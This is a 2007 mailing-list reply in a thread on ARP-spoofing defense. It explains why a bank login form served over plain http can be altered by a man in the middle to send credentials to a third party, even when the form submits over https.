ARP-spoofing defense
Michael L Torrie
torriem at chem.byu.edu
Mon Mar 19 08:55:23 MDT 2007
On Mon, 2007-03-19 at 08:34 -0600, Brandon Stout wrote:
> I avoid banks - go Credit Unions! Bank is, after all, a 4 letter
> word... Most banks and credit unions use http for the front page
> and
> other public pages. Encryption increases bandwidth usage, so for
> large banks this makes sense. When you submit your password, it
> switches to https to encrypt your user name/password combo. Use a
> packet sniffer to make sure, but usually, even when the login page
> is
> http, your password will get sent https.
You missed the point. If the main page that contains the username and
password field is served using normal http, then a malicious man in the
middle can alter the form and send your username and password to a third
party, all without messing with ssl certificates. Topher has written
code to do this on a LAN.
Michael
More information about the PLUG
mailing list